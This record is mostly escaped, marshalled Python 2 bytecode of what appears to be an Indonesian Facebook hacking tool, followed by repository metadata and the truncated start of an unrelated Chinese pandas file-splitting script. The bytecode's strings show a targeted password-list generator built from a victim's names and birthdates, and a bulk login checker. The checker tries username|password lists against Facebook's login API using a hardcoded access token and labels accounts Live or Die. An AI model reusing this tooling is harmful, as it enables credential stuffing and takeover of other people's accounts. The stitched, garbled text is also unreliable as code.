founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s?\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mFill in the complete data of the target belowi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s&\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: s\x04\x00\x00\x00.txtR\x11\x00\x00\x00s\'\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: s)\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: s>\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: i\x00\x00\x00\x00i\x02\x00\x00\x00i\x04\x00\x00\x00s)\x00\x00\x00\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :vs&\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: sD\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: s%\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mCreate \x1b[1;97m...s\xfc\x01\x00\x00%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%sid\x00\x00\x00s\x01\x00\x00\x00\ng\x00\x00\x00\x00\x00\x00\xf8?s/\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSaved \x1b[1;91m: \x1b[1;97m %s.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x11\x00\x00\x00\x1b[1;91m[!] Failed(\x0f\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00Rg\x00\x00\x00R@\x01\x00\x00(\x14\x00\x00\x00R4\x00\x00\x00Rm\x00\x00\x00R\xcc\x00\x00\x00R\xe1\x00\x00\x00R\xe2\x00\x00\x00R\x12\x00\x00\x00R\x1f\x00\x00\x00R0\x01\x00\x00t\x01\x00\x00\x00gt\x01\x00\x00\x00hR\x13\x00\x00\x00R\x1a\x00\x00\x00t\x01\x00\x00\x00kt\x01\x00\x00\x00lt\x01\x00\x00\x00mR\xa8\x00\x00\x00t\x02\x00\x00\x00wgt\x02\x00\x00\x00ent\x04\x00\x00\x00wordt\x03\x00\x00\x00gen(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfb\x00\x00\x00\xfb\x08\x00\x00sx\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\r\x01\x05\x01\x05\x01\t\x01\x0c\x01\x13\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\r\x01\r\x01\n\x01\t\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\r\x01\r\x01\n\x01\xff\x00\xff\x00}\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\n\x01\r\x01\t\x01\t\x01\n\x01\x0b\x01\x0f\x01\x05\x01\n\x01c\x00\x00\x00\x00\r\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s@\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHg\x00\x00}\x01\x00g\x00\x00}\x02\x00g\x00\x00}\x03\x00y%\x00t\t\x00d\n\x00\x83\x01\x00}\x04\x00t\x02\x00|\x04\x00d\x03\x00\x83\x02\x00j\n\x00\x83\x00\x00}\x05\x00Wn\'\x00\x04t\x04\x00k\n\x00r\xe0\x00\x01\x01\x01d\x0b\x00GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01n\x01\x00Xt\t\x00d\r\x00\x83\x01\x00}\x06\x00t\x0c\x00d\x0e\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GHx\xe2\x00|\x05\x00D]\xda\x00}\x07\x00|\x07\x00j\r\x00\x83\x00\x00j\x0e\x00t\x0f\x00|\x06\x00\x83\x01\x00\x83\x01\x00\\\x02\x00}\x08\x00}\t\x00d\x0f\x00|\x08\x00\x17d\x10\x00\x17|\t\x00\x17d\x11\x00\x17}\n\x00t\x10\x00j\x11\x00|\n\x00\x83\x01\x00}\x0b\x00t\x12\x00j\x13\x00|\x0b\x00j\x14\x00\x83\x01\x00}\x0c\x00d\x12\x00|\x0c\x00k\x06\x00r\x92\x01|\x01\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x13\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01d\x15\x00|\x0c\x00d\x16\x00\x19k\x06\x00r\xc3\x01|\x02\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x17\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01|\x03\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x18\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01Wd\x08\x00d\t\x00\x14GHd\x19\x00t\x0f\x00t\x16\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17t\x0f\x00t\x16\x00|\x02\x00\x83\x01\x00\x83\x01\x00\x17d\x1b\x00\x17t\x0f\x00t\x16\x00|\x03\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01d\x00\x00S(\x1c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sB\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCreate in file\x1b[1;91m : \x1b[1;97musername|passwordi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile path \x1b[1;91m:\x1b[1;97m s\x19\x00\x00\x00\x1b[1;91m[!] File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s%\x00\x00\x00\x1b[1;97m[ \x1b[1;92mLive\x1b[1;97m ] \x1b[1;97mR\xd4\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s&\x00\x00\x00\x1b[1;97m[ \x1b[1;93mCheck\x1b[1;97m ] \x1b[1;97ms$\x00\x00\x00\x1b[1;97m[ \x1b[1;91mDie\x1b[1;97m ] \x1b[1;97ms4\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92ms\x15\x00\x00\x00 \x1b[1;97mCheck=\x1b[1;93ms\x13\x00\x00\x00 \x1b[1;97mDie=\x1b[1;91m(\x17\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xf2\x00\x00\x00R@\x01\x00\x00R \x00\x00\x00R\xd8\x00\x00\x00R\xd5\x00\x00\x00R\x17\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x94\x00\x00\x00R\x0e\x00\x00\x00(\r\x00\x00\x00R4\x00\x00\x00t\x04\x00\x00\x00liveR7\x00\x00\x00t\x03\x00\x00\x00dieR\xcc\x00\x00\x00t\x04\x00\x00\x00listt\x07\x00\x00\x00pemisaht\x04\x00\x00\x00mekiR\xde\x00\x00\x00RC\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R\xdf\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RB\x01\x00\x008\t\x00\x00sT\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\t\x01\x06\x01\x06\x01\x06\x01\x03\x01\x0c\x01\x19\x01\r\x01\x05\x01\n\x01\x0b\x01\x0c\x01\n\x01\t\x01\r\x01!\x01\x16\x01\x0f\x01\x12\x01\x0c\x01\r\x01\x14\x01\x10\x01\r\x01\x14\x02\r\x01\x15\x01\t\x01=\x01\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x1a\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHy\xd4\x00t\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00xp\x00|\x02\x00d\t\x00\x19D]d\x00}\x03\x00|\x03\x00d\n\x00\x19}\x04\x00|\x03\x00d\x0b\x00\x19}\x05\x00t\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x06\x00t\x10\x00j\x11\x00|\x05\x00\x83\x01\x00\x01|\x06\x00j\x12\x00|\x05\x00d\x0e\x00\x17\x83\x01\x00\x01d\x0f\x00t\x13\x00|\x05\x00\x83\x01\x00\x17d\x10\x00\x17t\x13\x00|\x04\x00\x83\x01\x00\x17GHq\xca\x00Wd\x11\x00d\x12\x00\x14GHd\x13\x00t\x14\x00t\x10\x00\x83\x01\x00\x16GHd\x14\x00GH|\x06\x00j\x15\x00\x83\x00\x00\x01t\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01Wn\xa8\x00\x04t\x18\x00t\x19\x00f\x02\x00k\n\x00r\x9a\x01\x01\x01\x01d\x16\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n|\x00\x04t\x1a\x00k\n\x00r\xcd\x01\x01\x01\x01t\x00\x00j\x1b\x00d\x0c\x00\x83\x01\x00\x01d\x17\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01nI\x00\x04t\x0b\x00j\x1c\x00j\x1d\x00k\n\x00r\xef\x01\x01\x01\x01d\x18\x00GHt\x1e\x00\x83\x00\x00\x01n\'\x00\x04t\x04\x00k\n\x00r\x15\x02\x01\x01\x01d\x19\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1a\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00https://graph.facebook.com/me/groups?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00out/Grupid.txtR\x11\x00\x00\x00s\x01\x00\x00\x00\ns!\x00\x00\x00\x1b[1;97m[ \x1b[1;92mMyGroup\x1b[1;97m ] s\x04\x00\x00\x00 => i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal Group \x1b[1;91m:\x1b[1;97m %ss6\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSaved \x1b[1;91m: \x1b[1;97mout/Grupid.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No Connections\x10\x00\x00\x00\x1b[1;91m[!] Error(\x1f\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x08\x00\x00\x00listgrupR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00R,\x00\x00\x00t\x06\x00\x00\x00removeRi\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x02\x00\x00\x00uht\x03\x00\x00\x00gudR\xf1\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00R0\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RC\x01\x00\x00f\t\x00\x00s\\\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x03\x01\x13\x01\x12\x01\x11\x01\n\x01\n\x01\x0f\x01\r\x01\x11\x01!\x01\t\x01\x0f\x01\x05\x01\n\x01\n\x01\x0b\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\r\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHt\n\x00d\x0b\x00\x83\x01\x00}\x00\x00|\x00\x00d\x0c\x00k\x02\x00r\xb4\x00d\r\x00}\x01\x00t\x0b\x00t\x04\x00|\x01\x00\x83\x02\x00\x01nU\x00|\x00\x00d\x0e\x00k\x02\x00r\xd6\x00d\x0f\x00}\x02\x00t\x0b\x00t\x04\x00|\x02\x00\x83\x02\x00\x01n3\x00|\x00\x00d\x10\x00k\x02\x00r\xec\x00t\x0c\x00\x83\x00\x00\x01n\x1d\x00|\x00\x00d\x11\x00k\x02\x00r\x02\x01t\r\x00\x83\x00\x00\x01n\x07\x00t\r\x00\x83\x00\x00\x01d\x00\x00S(\x12\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s.\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Activates2\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Not activates*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91s\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR8\x00\x00\x00t\x04\x00\x00\x00trueR9\x00\x00\x00t\x05\x00\x00\x00falseR:\x00\x00\x00R\n\x00\x00\x00(\x0e\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xc4\x00\x00\x00R@\x01\x00\x00R\x08\x00\x00\x00(\x03\x00\x00\x00RH\x01\x00\x00t\x05\x00\x00\x00aktift\x03\x00\x00\x00non(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RD\x01\x00\x00\x97\t\x00\x00s4\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x06\x01\x10\x01\x0c\x01\x06\x01\x10\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x01\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s3\x00\x00\x00d\x01\x00|\x00\x00\x16}\x01\x00t\x00\x00j\x01\x00|\x01\x00\x83\x01\x00}\x02\x00t\x02\x00j\x03\x00|\x02\x00j\x04\x00\x83\x01\x00}\x03\x00|\x03\x00d\x02\x00\x19S(\x03\x00\x00\x00Ns-\x00\x00\x00https://graph.facebook.com/me?access_token=%sRj\x00\x00\x00(\x05\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00(\x04\x00\x00\x00R4\x00\x00\x00Rk\x00\x00\x00RG\x01\x00\x00t\x03\x00\x00\x00uid(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\n\x00\x00\x00get_userid\xb5\t\x00\x00s\x08\x00\x00\x00\x00\x01\n\x01\x0f\x01\x12\x01c\x02\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe7\x00\x00\x00t\x00\x00|\x00\x00\x83\x01\x00}\x02\x00d\x01\x00|\x01\x00t\x01\x00|\x02\x00\x83\x01\x00f\x02\x00\x16}\x03\x00i\x02\x00d\x02\x00d\x03\x006d\x04\x00|\x00\x00\x16d\x05\x006}\x04\x00d\x06\x00}\x05\x00t\x02\x00j\x03\x00|\x05\x00d\x07\x00|\x03\x00d\x08\x00|\x04\x00\x83\x01\x02}\x06\x00|\x06\x00j\x04\x00GHd\t\x00|\x06\x00j\x04\x00k\x06\x00r\x9d\x00t\x05\x00j\x06\x00d\n\x00\x83\x01\x00\x01t\x07\x00GHd\x0b\x00GHt\x08\x00d\x0c\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01nF\x00d\r\x00|\x06\x00j\x04\x00k\x06\x00r\xd7\x00t\x05\x00j\x06\x00d\n\x00\x83\x01\x00\x01t\x07\x00GHd\x0e\x00GHt\x08\x00d\x0c\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01n\x0c\x00d\x0f\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00Ns\x8a\x01\x00\x00variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutations!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00Content-Types\x08\x00\x00\x00OAuth %st\r\x00\x00\x00Authorizations"\x00\x00\x00https://graph.facebook.com/graphqlRl\x00\x00\x00t\x07\x00\x00\x00headerss\x12\x00\x00\x00"is_shielded":trueR&\x00\x00\x00s*\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivates\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x13\x00\x00\x00"is_shielded":falses.\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mNot activates\x10\x00\x00\x00\x1b[1;91m[!] Error(\x0b\x00\x00\x00R_\x01\x00\x00R\x17\x00\x00\x00Rb\x00\x00\x00Rh\x00\x00\x00Rf\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00R\x08\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x06\x00\x00\x00enableRj\x00\x00\x00Rl\x00\x00\x00Ra\x01\x00\x00Rk\x00\x00\x00RG\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xc4\x00\x00\x00\xbb\t\x00\x00s(\x00\x00\x00\x00\x01\x0c\x01\x16\x01\x18\x01\x06\x01\x1b\x01\x08\x01\x0f\x01\r\x01\x05\x01\x05\x01\n\x01\n\x01\x0f\x01\r\x01\x05\x01\x05\x01\n\x01\n\x02\x05\x01(\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(v\x00\x00\x00R\x05\x00\x00\x00R\x06\x00\x00\x00R\x1c\x00\x00\x00t\x08\x00\x00\x00datetimeR\x0c\x00\x00\x00R^\x00\x00\x00R\xa1\x00\x00\x00R\xce\x00\x00\x00Rd\x00\x00\x00RS\x00\x00\x00R\xbb\x00\x00\x00t\t\x00\x00\x00cookielibt\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00RU\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR(\x00\x00\x00Rb\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x01\x00\x00\x00R\x02\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingRT\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\x08\x00\x00\x00R\x14\x00\x00\x00R\x0f\x00\x00\x00R \x00\x00\x00R.\x00\x00\x00R#\x00\x00\x00R\xd9\x00\x00\x00R\xd2\x00\x00\x00R\xda\x00\x00\x00R\xdb\x00\x00\x00R\xe5\x00\x00\x00R\xdc\x00\x00\x00R\x93\x00\x00\x00R\x9b\x00\x00\x00R\x9f\x00\x00\x00R\xa3\x00\x00\x00R\xa4\x00\x00\x00Rj\x00\x00\x00R\xa5\x00\x00\x00R\xa6\x00\x00\x00R\xa7\x00\x00\x00R\xa9\x00\x00\x00R&\x01\x00\x00R-\x01\x00\x00R.\x01\x00\x00R1\x01\x00\x00RV\x01\x00\x00t\x06\x00\x00\x00vulnott\x04\x00\x00\x00vulnR0\x00\x00\x00R1\x00\x00\x00R3\x00\x00\x00R=\x00\x00\x00R2\x00\x00\x00R;\x00\x00\x00R+\x00\x00\x00Rr\x00\x00\x00Ru\x00\x00\x00R\x80\x00\x00\x00R\x7f\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00R\x89\x00\x00\x00R\x8a\x00\x00\x00R\x8b\x00\x00\x00R?\x00\x00\x00R\x8c\x00\x00\x00R\x8d\x00\x00\x00R\x8e\x00\x00\x00Rv\x00\x00\x00R\xaa\x00\x00\x00R\xab\x00\x00\x00R\xac\x00\x00\x00R\xd0\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xe3\x00\x00\x00R\xaf\x00\x00\x00R\xf3\x00\x00\x00R\xb0\x00\x00\x00R\xfd\x00\x00\x00R\xfe\x00\x00\x00R\xff\x00\x00\x00R\x00\x01\x00\x00R\x01\x01\x00\x00R\x11\x01\x00\x00R\x10\x01\x00\x00R\x12\x01\x00\x00R\x1a\x01\x00\x00R"\x01\x00\x00R\x13\x01\x00\x00R+\x01\x00\x00R,\x01\x00\x00R\x14\x01\x00\x00R\x15\x01\x00\x00R\x16\x01\x00\x00R\x17\x01\x00\x00R\x18\x01\x00\x00R@\x01\x00\x00R?\x01\x00\x00RA\x01\x00\x00R\xfb\x00\x00\x00RB\x01\x00\x00RC\x01\x00\x00RD\x01\x00\x00R_\x01\x00\x00RW\x00\x00\x00R\xc4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00<module>\x08\x00\x00\x00s\xd2\x00\x00\x00\x90\x01\x10\x01\x03\x01\x10\x01\r\x01\x11\x01\x03\x01\x10\x01\r\x01\x11\x01\x10\x01\x10\x04\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x0c\x03\t\x05\t\x07\t\n\t\x14\x06\x03\t\x05\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\t!\t\x17\t7\t\x17\t#\t\x1b\t7\t\x19\t"\t2\t;\t:\t@\t@\t7\tA\t9\tA\t\x14\t\x17\t\xb3\t\x1c\t&\t\x0f\t\x13\t\xa7\t6\t\x13\t\x14\t\x14\t=\tF\tF\t?\t\x16\t\x1a\t\x15\t\x1e\t!\t\x15\t\x1e\t)\t$\t,\t(\t!\t"\t\x14\t\x16\t\x1a\t=\t.\t1\t\x1e\t\x06\x0c\x17'''))
|
[
"noreply@github.com"
] |
RandiSr.noreply@github.com
|
942bc1da706f608feed237c33fbfea72edac961d
|
59e1df5962e76086bc5d9f88d96115d9a92bcda6
|
/拆分文件.py
|
ad97317632c30db1e6d4aa9383f986bc6d6f131d
|
[] |
no_license
|
jiajinlong0301/ibond_jia
|
484a68b7e3c9ee265824d31e8658448c04aa1d8a
|
8dc6dd90ff68aa2f91359792837d2052e57d8576
|
refs/heads/master
| 2023-01-28T03:11:56.759342
| 2020-12-03T07:28:58
| 2020-12-03T07:28:58
| 313,263,427
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
import os
import pandas as pd
# filename为文件路径,file_num为拆分后的文件行数
# 根据是否有表头执行不同程序,默认有表头的
def Data_split(filename,file_num,header=True):
if header:
